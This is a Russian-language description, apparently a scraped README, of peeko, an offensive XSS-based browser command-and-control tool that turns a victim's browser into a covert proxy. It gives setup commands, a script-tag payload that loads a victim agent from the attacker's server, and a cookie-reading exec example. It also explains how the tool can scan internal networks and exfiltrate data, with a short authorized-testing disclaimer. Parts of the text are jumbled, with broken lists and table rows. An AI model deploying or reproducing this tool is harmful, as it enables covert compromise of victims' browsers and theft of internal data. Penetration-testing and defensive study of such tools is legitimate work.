
peeko – браузерный XSS C2 для скрытного исследования внутренней сети через заражённый браузер.
Версия: v1.1
peeko — это браузерный C2 (Command and Control) инструмент на основе XSS, который использует браузер жертвы в качестве скрытого прокси внутри внутренних сетей.
Через внедрённый XSS-пейлоад peeko устанавливает WebSocket-соединение с центральным сервером, позволяя атакующему удалённо управлять браузером жертвы для отправки запросов к внутренним сервисам, сканирования сетей, эксфильтрации данных или даже выполнения произвольного JavaScript — всё это без доставки на устройство жертвы ни одного бинарного файла.
.txt или .jsonКлонируйте репозиторий:
git clone https://github.com/b3rito/peeko.git
cd peeko
Установите зависимости:
make install
(Необязательно) Сделайте скрипты исполняемыми:
chmod +x gen-cert.sh start.sh
Сгенерируйте самоподписанный TLS-сертификат:
make cert
Замените заполнитель SERVER-IP:
Откройте и отредактируйте следующие файлы:
static/agent.jsstatic/control.htmlЗамените SERVER-IP на IP-адрес/домен вашего сервера:
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
Запустите сервер:
make run
Откройте панель управления в вашем браузере:
192.168.1.0/24, 10.0.0.10-20 и т. д.80, 443,8000-8080)exec:... для отправкиexec:alert(document.cookie);.txt или .jsonСовременные политики браузеров влияют на то, к чему peeko может получить доступ.
| Заголовок | Можно прочитать содержимое? | Примечания |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | Полный доступ к ответу |
| Без заголовка | ⚠️ | Ответ непрозрачен |
Жертва подключается через HTTPS. Если сканируемая цель использует только HTTP:
http://-адресовВо время пентеста, если вы найдёте внутренний сервис, который отвечает с заголовком Access-Control-Allow-Origin: * и обслуживается по HTTPS, то peeko становится скрытым прокси, способным эксфильтровать внутренние данные напрямую из браузера жертвы — без доставки каких-либо файлов и без открытия исходящих соединений.
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования.
Любое использование peeko вне сред, где у вас есть явное разрешение, строго запрещено.
Вы несёте ответственность за свои действия.
Авторы: b3rito из mes3hacklab и GioPpeTto
https://192.168.30.136:8443/static/control.html
Внедрите агента (пример XSS):
<script src="https://192.168.30.136:8443/static/agent.js"></script>
| Ограниченный источник | ❌ | Заблокирован или не читается |